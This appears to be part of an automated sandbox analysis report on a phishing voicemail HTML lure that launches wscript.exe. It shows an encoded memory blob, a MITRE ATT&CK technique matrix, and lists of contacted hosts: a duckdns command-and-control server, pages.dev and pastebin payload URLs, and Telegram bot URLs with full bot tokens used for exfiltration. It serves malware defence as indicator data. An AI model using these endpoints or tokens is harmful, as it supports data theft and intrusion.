OPKu0oAcpq8vd+lHYAPi2HAUcQm0WOCPz67RrkLsRxAJPO7PF4kIa8D6hhDwe1SSw/oX9dLVKKbaY24VGwWA2JQ2Y00/Vx6ROHjYhm1sVWik7plfT5tkfUFyH647qa8rHvo87JeRV9VeRutpsclfhE9izowQTPKV4xyXkH+jemdntWfkYWwHlymy3lOCmJWGp4a9AjJXvXIu2oUrltlzS/FNcoFNAlbr/JUrB2w06WstY5yxZTtZDOjNJBJOXbR3ucmdmWKpWR2Y7KYSdHA+IZCIZtJJd2MnacDiYFxkHrtXKHkWg6ag479GSvlorXbGh2ynEOZlFWk4f2OlUwPJfdZO0aZDalDmbTl7O2mrcnUgYxbKkDXARrcMbiDkPqVUu6Ffr16bkMSVWZUhqmiQciiRMq1nTP077O8PhXbh8aLrpUjz0B0lX3HLHdPRSJXaU6fhZSqdkuOsRkyO4u+oGzkZDWHmmqv5fZM8+IM6eoBq3ttOog5FsmmLZa7NVnc32unLRoeL1hMkPWw7WXX1ItVca09e/rzRTeZT6FFw5TxEerLFAt2cTqbTYSaMuUMvh0YL1uT6M/DXflkFn7O8+e4u5LZkoVlZ19KAlWrs45YtHl4x/ZPUCqbsfIuJR28A+xHiOQsGqVCcjxrJ9N7krn0hSt96+EPjFOkopzSnq5yoxsTcQuuA4rf6KZR284CL4EwRV5R7iEbHHGeEo5BtNhpMnrL9nqdd9uHL1w5izc0kyDFZlGvQNu3e8DK2c64VCothhUMe2i3k6lMzhcaHcdiddF2d2c+lyzsyliHd+wbQkhwBOzKOC78vyGbtVObjmCEYilneaPSFaU8XOfuJ/n5eMGxXY7wYs5y99tpKJRrIiOjVLGDPdPj74kEh72dx3rgkLCytCmdwd7Y6NiHi8nRrLXBhf9GsS1mMoZcrM+UjrTVZ3u6MlnE7xYrbzkQSDNnSocv3pdJjuXtoptJFanPGi2NjVnOdjvPu2a6fJm5NZNOW/kp+tyRWR69sltgYz6ddNLe8TfVHeosj7Y9mZtt3nSP4DApZsbytNXKFi6zxg/bTnpWDyyCm8lZsy3wGdzXcoocb95Gl6tS5vLqbIWl2cou3uzYOZ+yASFwKMnHlbclpnbn+BbHLhV67WzWC5Mpq3gjeyMUK60ZlsqtaxcqhsJyuDIzbcXLB4mdx0lUVtC/gzZjirTpSKboVia4KX8o49j5HG9rzMGn9mUci0/acYRsIZuE0f4N0sexuulIyirI+MYe8hmbHIdnmrWSzjQKzO1ZUZmDtc+fMg3IMO/P77OpfFYMJJ3ifpxJQ5mrrR372PpDluPiXNzpKQEcdB36FKZPGzOuz5cx63rqfK3ylunPH7IP8KnqdWbPsmKP0H0hbcS2pY2lffv40Hac5DhtxCY90GsXxlkhs+Wy+9ZtHO9P02WZbJb6stl+hJnjTvn7AA5TK9uzIpEGP+8CypZ3VW5LjtulKmEPvyyTT5dnvKE4xeVDJJ8cs9Jy5/t+w3FSwsEznhi0nFymWIQDsUd84hStKgB83gbP2d5unH4qeDSECe+VSjjwPsDlNZrJcu+KsLc95K12hZVNHpGtKqt3YzY4XjbbTq5YdQOuXHFmjvQQl2W9dDGN0G7qp+3Uh7xwNw0BL+Ido0iHcWMepgvxHjLyAZIuWZRDDryCJZvnlqTmzeTg7ScHWdbs0AGpm6Kz6VRbAMWl/fxtx/
Source: wscript.exe, 0000000C.00000003.2093542712.0000000005CC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 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

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	21 Scripting	Valid Accounts	11 Windows Management Instrumentation	21 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	131 Security Software Discovery	1 Remote Desktop Protocol	Data from Local System	2 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	3 System Information Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	3 Non-Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	14 Application Layer Protocol	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://json.#	0%	Avira URL Cloud	safe
https://cviocemusikdanxcehal.pages.dev/voic.txt	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readysoft	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready#	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready:	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready1	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready1m	0%	Avira URL Cloud	safe
https://json.geoiplookup.io/ZK	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready4	0%	Avira URL Cloud	safe
https://json.geoiplookup.io/	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readyUSER	0%	Avira URL Cloud	safe
https://pastie.io/raw/rlcqft	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready18	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready13	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readyil	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readyi	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readym	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readydns.org:8426/is-ready4F=	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readyows	0%	Avira URL Cloud	safe
https://json.geoiplookup.io/C	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/Voicemail%20Jud.html	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready4o	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readyz	0%	Avira URL Cloud	safe
https://cloudgoogle.pages.dev/love.js	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readycemail	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready1I	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readycom	0%	Avira URL Cloud	safe
https://json.geoiplookup.io/S	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready4C	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readyWdtP.	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readyCreationClassName	0%	Avira URL Cloud	safe
https://json.geo	0%	Avira URL Cloud	safe
https://json.geou	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-ready4E	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readyP	0%	Avira URL Cloud	safe
http://masterokrwh.duckdns.org:8426/is-readyT	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
json.geoiplookup.io	104.21.25.148	true	true	unknown
pastie.io	172.67.162.195	true	false	unknown
icons.iconarchive.com	104.21.235.214	true	false	high
www.google.com	172.217.4.68	true	false	high
cviocemusikdanxcehal.pages.dev	172.66.44.230	true	false	unknown
ip-api.com	208.95.112.1	true	false	high
cloudgoogle.pages.dev	172.66.47.2	true	false	unknown
api.telegram.org	149.154.167.220	true	false	high
pastebin.com	172.67.19.24	true	false	high
ipv4.imgur.map.fastly.net	199.232.192.193	true	false	unknown
masterokrwh.duckdns.org	45.133.174.75	true	true	unknown
i.stack.imgur.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cviocemusikdanxcehal.pages.dev/voic.txt	false	Avira URL Cloud: safe	unknown
https://icons.iconarchive.com/icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png	false		high
https://json.geoiplookup.io/	true	Avira URL Cloud: safe	unknown
https://i.stack.imgur.com/ZU3tO.png,%20&width=450	false		high
http://ip-api.com/json/	false		high
https://pastie.io/raw/rlcqft	false	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/Voicemail%20Jud.html	true	Avira URL Cloud: safe	low
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage	false		high
https://cloudgoogle.pages.dev/love.js	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-ready	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7198128499:AAHSvX4jW6n9t45ItKyUTcn3TOm2bCJdS-s/sendMessage	false		high
https://pastebin.com/raw/NsQ5qTHr	false		high
http://pastebin.com/raw/NsQ5qTHr	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot	wscript.exe, 0000000B.00000003.2092865617.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3662661142.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3662635567.00000210134D5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessagex~	wscript.exe, 0000000B.00000003.2093298186.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093476765.0000000003302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095486810.000000000331F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093647514.000000000331E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2091854276.00000000032F6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-ready#	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/	wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-ready:	wscript.exe, 0000000C.00000003.2776519179.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO	wscript.exe, 0000000B.00000003.2094115487.0000000003515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092299826.0000000006A37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092655310.0000000006A45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092655310.0000000006A42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2097565335.0000000006A45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2097565335.0000000006A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092593579.0000000006A1A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2094688191.0000000006A1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092452012.0000000006A3C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.0000021013A0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.0000021013A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3661737304.00000210112E5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-ready4	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-ready1	wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/NsQ5qTHra	wscript.exe, 00000011.00000002.3663058891.0000021013A34000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/botx67	wscript.exe, 00000011.00000002.3662046027.00000210130B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/NsQ5qTHre	wscript.exe, 00000011.00000002.3661806513.0000021012F35000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pastebin.com/raw/NsQ5qTHr9	wscript.exe, 00000011.00000002.3663058891.0000021013A34000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pastebin.com/raw/NsQ5qTHrst	wscript.exe, 00000011.00000002.3661806513.0000021012F35000.00000004.00000020.00020000.00000000.sdmp	false		high
https://json.#	wscript.exe, 0000000B.00000003.2094772697.000000000591A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095984043.000000000591A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2094069081.000000000591A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/%	wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pastebin.com/raw/NsQ5qTHr.G5u1	wscript.exe, 0000000C.00000002.3663596969.0000000006C18000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ip-api.com/json/43	wscript.exe, 00000011.00000003.2444699579.00000210130B7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/	wscript.exe, 0000000B.00000002.2097000697.00000000069D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000002.3663058891.00000210139C7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://json.geoiplookup.io/ZK	wscript.exe, 0000000B.00000003.2093298186.000000000334B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2091854276.000000000334B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095486810.0000000003353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093858081.0000000003352000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-readysoft	wscript.exe, 0000000C.00000003.2776519179.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2484400833.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/NsQ5qTHrn	wscript.exe, 00000011.00000002.3663058891.0000021013A34000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-ready1m	wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://icons.iconarchive.com/icons/dakirby309/simply-styled/256/Microsoft-SharePoint-2013-icon.png	Voicemail Jud.html	false		high
http://ip-api.com/VF	wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.2479805019.0000000006C84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessaget	wscript.exe, 0000000B.00000003.2094333401.0000000005F93000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663272487.0000000006493000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-readyUSER	wscript.exe, 0000000C.00000002.3664182847.0000000006CBA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://i.stack.imgur.com/ZU3tO.png	Voicemail Jud.html	false		high
http://masterokrwh.duckdns.org:8426/is-readym	wscript.exe, 0000000C.00000003.2776352925.0000000006C83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-readyi	wscript.exe, 0000000C.00000002.3664182847.0000000006CBA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-ready18	wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-ready13	wscript.exe, 0000000C.00000003.3228222744.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.3228443840.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-readyil	wscript.exe, 0000000C.00000003.3408815710.0000000006C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://json.geoiplookup.io/C	wscript.exe, 00000011.00000002.3662046027.00000210130B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/NsQ5qTHr:	wscript.exe, 00000011.00000002.3661806513.0000021012F35000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-readydns.org:8426/is-ready4F=	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessageZ	wscript.exe, 00000011.00000002.3663058891.00000210139EA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-readyows	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-ready4o	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-ready1I	wscript.exe, 0000000C.00000002.3663596969.0000000006C75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-readyz	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6968126468:AAFBucF0UmhmKMp_	wscript.exe, 0000000B.00000003.2094772697.000000000591A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.2095984043.000000000591A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2094069081.000000000591A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pastebin.com/raw/NsQ5qTHrm	wscript.exe, 0000000B.00000002.2097462651.0000000006A26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092576951.0000000006A24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/NsQ5qTHrK	wscript.exe, 0000000B.00000002.2097462651.0000000006A26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2092576951.0000000006A24000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pastebin.com/raw/NsQ5qTHro	wscript.exe, 00000011.00000002.3663058891.0000021013A34000.00000004.00000020.00020000.00000000.sdmp	false		high
https://json.geoiplookup.io/S	wscript.exe, 0000000C.00000002.3661089635.0000000003605000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-readycemail	wscript.exe, 0000000C.00000002.3661089635.0000000003659000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://masterokrwh.duckdns.org:8426/is-readycom	wscript.exe, 0000000C.00000002.3663272487.0000000006493000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/NsQ5qTHrL	wscript.exe, 0000000B.00000002.2095486810.0000000003370000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2091854276.0000000003370000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.2093298186.0000000003370000.00000004.00000020.00020000.00000000.sdmp	false		high
http://masterokrwh.duckdns.org:8426/is-ready4C	wscript.exe, 0000000C.00000002.3661089635.00000000035A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
